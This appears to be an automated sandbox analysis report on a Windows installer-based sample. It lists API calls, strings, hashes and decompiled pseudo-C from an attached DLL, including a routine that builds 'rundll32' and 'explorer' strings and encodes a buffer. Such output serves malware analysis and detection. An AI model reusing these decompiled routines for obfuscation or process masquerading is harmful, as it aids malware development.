                                                                                                                                                                  • TlsSetValue.KERNEL32(?,?), ref: 004143A2
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004143AC
                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 004143EB
                                                                                                                                                                  • CoUninitialize.OLE32(?,004158CA,?,?), ref: 00414428
                                                                                                                                                                  Strings
                                                                                                                                                                  • elevation.cpp, xrefs: 004143D0
                                                                                                                                                                  • Failed to set elevated cache pipe into thread local storage for logging., xrefs: 004143DA
                                                                                                                                                                  • Failed to pump messages in child process., xrefs: 00414416
                                                                                                                                                                  • Failed to initialize COM., xrefs: 004143F7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorInitializeLastUninitializeValue
                                                                                                                                                                  • String ID: Failed to initialize COM.$Failed to pump messages in child process.$Failed to set elevated cache pipe into thread local storage for logging.$elevation.cpp
                                                                                                                                                                  • API String ID: 876858697-113251691
                                                                                                                                                                  • Opcode ID: 080ef6d99993b48147500fa5b40c6b3598b58e80f9c0843c479e155703324004
                                                                                                                                                                  • Instruction ID: 67de8972aa042d51126ec1ec1ef6bf357e13e0fc8c4b195c3a20b205707e2442
                                                                                                                                                                  • Opcode Fuzzy Hash: 080ef6d99993b48147500fa5b40c6b3598b58e80f9c0843c479e155703324004
                                                                                                                                                                  • Instruction Fuzzy Hash: 35115C72A01634BB97215711AC05FCFBF98EF45761B114227FD00F3150D7289C4085ED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 004026F1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
                                                                                                                                                                  • API String ID: 3535843008-3209209246
                                                                                                                                                                  • Opcode ID: d954b8cb5e38123cec9e09c0387a6ee3561277ec73dabefb1d013fc090d8f04e
                                                                                                                                                                  • Instruction ID: 6ba5ea62e0eecaf88160f002bab4ae3caba0e18111bfaa2c6bd7f1c4bcffeb1d
                                                                                                                                                                  • Opcode Fuzzy Hash: d954b8cb5e38123cec9e09c0387a6ee3561277ec73dabefb1d013fc090d8f04e
                                                                                                                                                                  • Instruction Fuzzy Hash: 8A01F932D40224B7CB126655AD07E9E7668DF68765F209137F800B61D0CBBD9E1096AC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040DFAE: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,?,00000009,?,?,?,0040E53C,00000009,?,00000000,?,?,?,00401720), ref: 0040E04A
                                                                                                                                                                  • Sleep.KERNEL32(000007D0,?,00000000,Setup,00000000,log,0000000D,00000000,00000009,?,00000000,?,?,?,00401720,?), ref: 0040E5D1
                                                                                                                                                                    • Part of subcall function 0040E054: GetTempPathW.KERNEL32(00000104,?,?,00000000,0000000D), ref: 0040E0A8
                                                                                                                                                                    • Part of subcall function 0040E054: GetLastError.KERNEL32(?,00000000,0000000D), ref: 0040E0B2
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get non-session specific TEMP folder., xrefs: 0040E67B
                                                                                                                                                                  • Failed to open log: %ls, xrefs: 0040E64D
                                                                                                                                                                  • log, xrefs: 0040E580
                                                                                                                                                                  • Failed to copy full log path to prefix., xrefs: 0040E72E
                                                                                                                                                                  • Failed to copy log extension to extension., xrefs: 0040E713
                                                                                                                                                                  • Failed to get current directory., xrefs: 0040E5BB
                                                                                                                                                                  • Setup, xrefs: 0040E586
                                                                                                                                                                  • Failed to copy log path to prefix., xrefs: 0040E6F3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseErrorLastPathSleepTemp
                                                                                                                                                                  • String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$log
                                                                                                                                                                  • API String ID: 2857185464-2818506709
                                                                                                                                                                  • Opcode ID: 24b3a5dccada6b2f96b6bbff8f04a283539fbcc0e68479341c353c76a64632b4
                                                                                                                                                                  • Instruction ID: dd1a61693d7cb3461a8d22736f25847554aba28b593d99ae24de9ee36724c2e8
                                                                                                                                                                  • Opcode Fuzzy Hash: 24b3a5dccada6b2f96b6bbff8f04a283539fbcc0e68479341c353c76a64632b4
                                                                                                                                                                  • Instruction Fuzzy Hash: 0E61A271A00211BADB259B76CC41B6B76A8AF14344F144D7BF801EB2D0E7BDED6087A9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                  			E1002199A(void* __ebx, void* __edx, void* __edi) {
                                                                                                                                                                  				void* _t60;
                                                                                                                                                                  				void* _t80;
                                                                                                                                                                  				void* _t101;
                                                                                                                                                                  				void* _t154;
                                                                                                                                                                  				void* _t156;
                                                                                                                                                                  				void* _t158;
                                                                                                                                                                  				void* _t171;
                                                                                                                                                                  
                                                                                                                                                                  				L0:
                                                                                                                                                                  				while(1) {
                                                                                                                                                                  					L0:
                                                                                                                                                                  					_t150 = __edi;
                                                                                                                                                                  					_t106 = __ebx;
                                                                                                                                                                  					 *((intOrPtr*)(_t154 - 0xe2e0)) =  *((intOrPtr*)(_t154 - 0xe2e0)) + 1;
                                                                                                                                                                  					_t60 = E10002270(_t154 - 0xe2a4);
                                                                                                                                                                  					_t174 =  *((intOrPtr*)(_t154 - 0xe2e0)) - _t60;
                                                                                                                                                                  					if( *((intOrPtr*)(_t154 - 0xe2e0)) >= _t60) {
                                                                                                                                                                  						break;
                                                                                                                                                                  					}
                                                                                                                                                                  					L2:
                                                                                                                                                                  					E1000CF80(__edi, _t154 - 0xab84, 0, 0x3710);
                                                                                                                                                                  					E1000CF80(_t150, _t154 - 0x3d54, 0, 0x3710);
                                                                                                                                                                  					_t80 = E10001A50(E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=");
                                                                                                                                                                  					_t151 = _t80 - E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0))));
                                                                                                                                                                  					E1000D1F0(__ebx, _t150, _t80 - E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t154 - 0xab84, E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t80 - E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))));
                                                                                                                                                                  					E1000D903( *((intOrPtr*)(_t154 - 0xe2e0)), _t154 - 0x3d54, 0x3710, E10001A50(E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=") + 1);
                                                                                                                                                                  					E1000CF80(_t150, _t154 - 0xe294, 0, 0x3710);
                                                                                                                                                                  					E1000CF80(_t150, _t154 - 0x746c, 0, 0x3710);
                                                                                                                                                                  					E1000CCA3(_t150, _t154 - 0xe294,  *((intOrPtr*)(_t154 - 0x3d58)), _t154 - 0xab84);
                                                                                                                                                                  					_push(_t154 - 0x3d54);
                                                                                                                                                                  					_push(_t154 - 0xe294);
                                                                                                                                                                  					_push( *((intOrPtr*)(_t154 + 8)));
                                                                                                                                                                  					E1000CCA3(_t150, _t154 - 0x746c,  *((intOrPtr*)(_t154 - 0x7470)),  *((intOrPtr*)(_t154 - 0x18)));
                                                                                                                                                                  					_t171 = _t156 + 0x7c;
                                                                                                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
                                                                                                                                                                  						E1000D1F0(_t106, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x746c, E1000CAD0(_t154 - 0x746c));
                                                                                                                                                                  						_t171 = _t171 + 0x10;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t101 = E1000CAD0(_t154 - 0x746c);
                                                                                                                                                                  					_t156 = _t171 + 4;
                                                                                                                                                                  					 *((intOrPtr*)(_t154 - 0x14)) = _t101 +  *((intOrPtr*)(_t154 - 0x14));
                                                                                                                                                                  				}
                                                                                                                                                                  				L5:
                                                                                                                                                                  				 *((char*)(_t154 - 4)) = 1;
                                                                                                                                                                  				E100011A0(_t154 - 0xe2dc);
                                                                                                                                                                  				 *((char*)(_t154 - 4)) = 0;
                                                                                                                                                                  				E10003090(_t154 - 0xe2a4);
                                                                                                                                                                  				 *((intOrPtr*)(_t154 - 4)) = 0xffffffff;
                                                                                                                                                                  				E100011A0(_t154 - 0xe2c0);
                                                                                                                                                                  				 *(_t154 - 0x10) = "\r\n%s%s%s\r\n";
                                                                                                                                                                  				 *((char*)(_t154 - 0x21c)) = 0;
                                                                                                                                                                  				E1000CF80(__edi, _t154 - 0x21b, 0, 0x1ff);
                                                                                                                                                                  				_push( *((intOrPtr*)(_t154 - 0x18)));
                                                                                                                                                                  				_push( *((intOrPtr*)(_t154 + 8)));
                                                                                                                                                                  				E1000CCA3(_t150, _t154 - 0x21c,  *(_t154 - 0x10),  *((intOrPtr*)(_t154 - 0x18)));
                                                                                                                                                                  				_t158 = _t156 + 0x20;
                                                                                                                                                                  				if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
                                                                                                                                                                  					E1000D1F0(__ebx, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x21c, E1000CAD0(_t154 - 0x21c));
                                                                                                                                                                  					_t158 = _t158 + 0x10;
                                                                                                                                                                  				}
                                                                                                                                                                  				 *((intOrPtr*)(_t154 - 0x14)) = E1000CAD0(_t154 - 0x21c) +  *((intOrPtr*)(_t154 - 0x14));
                                                                                                                                                                  				 *[fs:0x0] =  *((intOrPtr*)(_t154 - 0xc));
                                                                                                                                                                  				return  *((intOrPtr*)(_t154 - 0x14));
                                                                                                                                                                  			}











                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_strlen$_sprintf$__output_l_strcpy_s
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3854912713-0
                                                                                                                                                                  • Opcode ID: ce6b15c3fcdaa56ceb52cb1d185c127a632914fc5c4c1566f2125b128dce72e4
                                                                                                                                                                  • Instruction ID: 1147c12dce7df64e2ed4ffc9360bb1615f7fbc1f7e9a2ddb3abdd0b7a3fb9a22
                                                                                                                                                                  • Opcode Fuzzy Hash: ce6b15c3fcdaa56ceb52cb1d185c127a632914fc5c4c1566f2125b128dce72e4
                                                                                                                                                                  • Instruction Fuzzy Hash: 6B41A6B6D001186BDB14D7A0DC92EEE737DEF04240F0448A5F50DB6246EB757B488BA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,?,00416698,00000000,00000000,00000000,00000001,00000000,00000001,?,00000000,00000001), ref: 004044A1
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000,?,00000001,?,?,?,?,00416698,00000000,00000000,00000000,00000001,00000000,00000001,?,00000000), ref: 004045D1
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to write variable value as number., xrefs: 004045AD
                                                                                                                                                                  • Failed to write variable value as string., xrefs: 0040459A
                                                                                                                                                                  • Failed to write variable name., xrefs: 004045BB
                                                                                                                                                                  • Failed to write included flag., xrefs: 004045C2
                                                                                                                                                                  • Unsupported variable type., xrefs: 004045A6
                                                                                                                                                                  • Failed to write variable value type., xrefs: 004045B4
                                                                                                                                                                  • Failed to write variable count., xrefs: 004044BB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to write included flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.
                                                                                                                                                                  • API String ID: 3168844106-275034954
                                                                                                                                                                  • Opcode ID: f19d28bbe33079136632ef5d8abd6555bc5d541ed182ffd124b4a3a66ed4d70b
                                                                                                                                                                  • Instruction ID: 8eaca3d603ec3d3a92ec4fdb04d335316eccbc37c5c049fc76d6513036bb9c56
                                                                                                                                                                  • Opcode Fuzzy Hash: f19d28bbe33079136632ef5d8abd6555bc5d541ed182ffd124b4a3a66ed4d70b
                                                                                                                                                                  • Instruction Fuzzy Hash: C041BFB2510616FFCB169F64DC40A5E7AA0BF48310F104227FB01762D0D739E9609F98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get current process directory., xrefs: 00413AAA
                                                                                                                                                                  • Failed to get path to current process., xrefs: 00413A8E
                                                                                                                                                                  • Failed to copy source path., xrefs: 00413B8D
                                                                                                                                                                  • Failed to combine last source with source., xrefs: 00413AC9
                                                                                                                                                                  • WixBundleLastUsedSource, xrefs: 00413A34
                                                                                                                                                                  • WixBundleOriginalSource, xrefs: 00413A4F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$CloseFileFirstlstrlen
                                                                                                                                                                  • String ID: Failed to combine last source with source.$Failed to copy source path.$Failed to get current process directory.$Failed to get path to current process.$WixBundleLastUsedSource$WixBundleOriginalSource
                                                                                                                                                                  • API String ID: 2767606509-10224182
                                                                                                                                                                  • Opcode ID: 0698bc28373c35da1d68245fcaef15d54a516aeacab2efef4553d9d6207ffa67
                                                                                                                                                                  • Instruction ID: 4c757f35194ed20d234cb27d9fa2254018be9a564835aa62fe734b8d3d384501
                                                                                                                                                                  • Opcode Fuzzy Hash: 0698bc28373c35da1d68245fcaef15d54a516aeacab2efef4553d9d6207ffa67
                                                                                                                                                                  • Instruction Fuzzy Hash: A0516E71D04219AFDF11DFA5CC41AEFBBB4AF08356F11456BE814F6251E738AE808B98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • HttpSendRequestW.WININET(?,00000000,00000000,00000000,00000000), ref: 00425923
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0042570D,?,?,?,?,?,?,?,00000000,?,?,?,?,?), ref: 0042592D
                                                                                                                                                                    • Part of subcall function 004386FC: HttpQueryInfoW.WININET(?,?,00000000,?,?), ref: 00438725
                                                                                                                                                                    • Part of subcall function 004386FC: GetLastError.KERNEL32 ref: 0043872F
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to send request to URL: %ls, trying to process HTTP status code anyway., xrefs: 00425943
                                                                                                                                                                  • Failed to get HTTP status code for request to URL: %ls, xrefs: 00425AC3
                                                                                                                                                                  • Unknown HTTP status code %d, returned from URL: %ls, xrefs: 00425AAA
                                                                                                                                                                  • Failed to get redirect url: %ls, xrefs: 00425A77
                                                                                                                                                                  • Failed to get HTTP status code for failed request to URL: %ls, xrefs: 00425963
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorHttpLast$InfoQueryRequestSend
                                                                                                                                                                  • String ID: Failed to get HTTP status code for failed request to URL: %ls$Failed to get HTTP status code for request to URL: %ls$Failed to get redirect url: %ls$Failed to send request to URL: %ls, trying to process HTTP status code anyway.$Unknown HTTP status code %d, returned from URL: %ls
                                                                                                                                                                  • API String ID: 3042603112-2903077892
                                                                                                                                                                  • Opcode ID: 079c4824d9f007b4ac4733160bdf402760976cacb2395f798e9ab7eebd497300
                                                                                                                                                                  • Instruction ID: 07e984adc39fe4f5005a601f73201bfbd26e3a2f9c7ed309fd19a6709aee4511
                                                                                                                                                                  • Opcode Fuzzy Hash: 079c4824d9f007b4ac4733160bdf402760976cacb2395f798e9ab7eebd497300
                                                                                                                                                                  • Instruction Fuzzy Hash: 0D41F771750E3AABEB155E68AC87B7B2658EB18350FA40327FC01DB350E27CCD41969D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,?,00000001,00000000,?,?,?,?,?,?,004201B3), ref: 00420A08
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,?,?,?,?,?,?,004201B3), ref: 00420A12
                                                                                                                                                                  Strings
                                                                                                                                                                  • apply.cpp, xrefs: 00420A36
                                                                                                                                                                  • Failed to clear readonly bit on payload destination path: %ls, xrefs: 00420A41
                                                                                                                                                                  • Failed attempt to download URL: '%ls' to: '%ls', xrefs: 00420AD5
                                                                                                                                                                  • download, xrefs: 004209D2
                                                                                                                                                                  • :, xrefs: 00420A8B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                                                                  • String ID: :$Failed attempt to download URL: '%ls' to: '%ls'$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$download
                                                                                                                                                                  • API String ID: 1799206407-1905830404
                                                                                                                                                                  • Opcode ID: 1b10e421fb509421af7df3d50118213b877061a46d8531d20e1e9ebedb8e97d8
                                                                                                                                                                  • Instruction ID: b5be7db71d0f6cc7fdaad5cbb4459bf297db5b848e0878b09bff066ac5df44a7
                                                                                                                                                                  • Opcode Fuzzy Hash: 1b10e421fb509421af7df3d50118213b877061a46d8531d20e1e9ebedb8e97d8
                                                                                                                                                                  • Instruction Fuzzy Hash: 0D51A272B00325AFEB10DF95D890BABB7F4FF14714F90805AE905AB252D379DA41CB98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                                  			E10022530(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                  				char _v16;
                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                  				char _v24;
                                                                                                                                                                  				char _v36;
                                                                                                                                                                  				char _v292;
                                                                                                                                                                  				signed int _v296;
                                                                                                                                                                  				char _v300;
                                                                                                                                                                  				intOrPtr _v304;
                                                                                                                                                                  				char _v308;
                                                                                                                                                                  				intOrPtr _v312;
                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                  				char _t61;
                                                                                                                                                                  				char _t62;
                                                                                                                                                                  				signed int _t70;
                                                                                                                                                                  				intOrPtr _t102;
                                                                                                                                                                  				intOrPtr _t103;
                                                                                                                                                                  				char _t115;
                                                                                                                                                                  				char _t116;
                                                                                                                                                                  				signed int _t118;
                                                                                                                                                                  
                                                                                                                                                                  				_t132 = __esi;
                                                                                                                                                                  				_t131 = __edi;
                                                                                                                                                                  				_t101 = __ebx;
                                                                                                                                                                  				_t61 = "rundll32"; // 0x646e7572
                                                                                                                                                                  				_v24 = _t61;
                                                                                                                                                                  				_t102 =  *0x100264e4; // 0x32336c6c
                                                                                                                                                                  				_v20 = _t102;
                                                                                                                                                                  				_t115 =  *0x100264e8; // 0x0
                                                                                                                                                                  				_v16 = _t115;
                                                                                                                                                                  				_t62 = "explorer"; // 0x6c707865
                                                                                                                                                                  				_v308 = _t62;
                                                                                                                                                                  				_t103 =  *0x100264f0; // 0x7265726f
                                                                                                                                                                  				_v304 = _t103;
                                                                                                                                                                  				_t116 =  *0x100264f4; // 0x0
                                                                                                                                                                  				_v300 = _t116;
                                                                                                                                                                  				E1000CF80(__edi,  &_v292, 0, 0x108);
                                                                                                                                                                  				E1001F1B0( &_v24,  &_v292,  &_v24);
                                                                                                                                                                  				E1000D1F0(__ebx, _t131, __esi,  &_v36,  &_v308, 8);
                                                                                                                                                                  				_t118 = _a4;
                                                                                                                                                                  				_v12 = E1000CAD0(_t118);
                                                                                                                                                                  				_v296 = 0;
                                                                                                                                                                  				_t70 = _v12 & 0x80000007;
                                                                                                                                                                  				if(_t70 < 0) {
                                                                                                                                                                  					_t70 = (_t70 - 0x00000001 | 0xfffffff8) + 1;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_t70 == 0) {
                                                                                                                                                                  					_t120 = _v12 + 8;
                                                                                                                                                                  					__eflags = _t120;
                                                                                                                                                                  					_v296 = _t120;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					asm("cdq");
                                                                                                                                                                  					_t120 = _t118 & 0x00000007;
                                                                                                                                                                  					_v296 = 8 + (_v12 + (_t118 & 0x00000007) >> 3) * 8;
                                                                                                                                                                  				}
                                                                                                                                                                  				_v8 = L1000CEAF(_t101, _t120, _t131, _t132, _v296);
                                                                                                                                                                  				E1000CF80(_t131, _v8, 0, _v296);
                                                                                                                                                                  				E1000D1F0(_t101, _t131, _t132, _v8, _a4, E1000CAD0(_a4));
                                                                                                                                                                  				E1001F110(_t101, _v8, _t131, _t132,  &_v292, _v8, _v8, _v296);
                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                  				_v312 = L1000CEAF(_t101, 1 + (_v296 + 2) / 3 * 4, _t131, _t132, 1 + (_v296 + 2) / 3 * 4);
                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                  				E1000CF80(_t131, _v312, 0, 1 + (_v296 + 2) / 3 * 4);
                                                                                                                                                                  				_t90 = _v296 + 2;
                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                  				E1001F2A0(_v312, 1 + (_v296 + 2) / 3 * 4, _v8, _v296);
                                                                                                                                                                  				_push(_v8);
                                                                                                                                                                  				E1000CA40(_t101, _t131, _t132, _t90 % 3);
                                                                                                                                                                  				return _v312;
                                                                                                                                                                  			}

























                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_strlen
                                                                                                                                                                  • String ID: explorer$rundll32
                                                                                                                                                                  • API String ID: 1975251954-2912785976
                                                                                                                                                                  • Opcode ID: 9443fa5ab6797b87b178558609728bb1873431855db9e7741aa6f05c907c90f5
                                                                                                                                                                  • Instruction ID: dabab85bc6ef052ed749d04d1e93e2dad56e743369109b7e858dc002110f0523
                                                                                                                                                                  • Opcode Fuzzy Hash: 9443fa5ab6797b87b178558609728bb1873431855db9e7741aa6f05c907c90f5
                                                                                                                                                                  • Instruction Fuzzy Hash: 9A516DBAD00218ABDB14DB98DC92FDE73B9EB4C304F044199E54997341EA31FB54CB91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
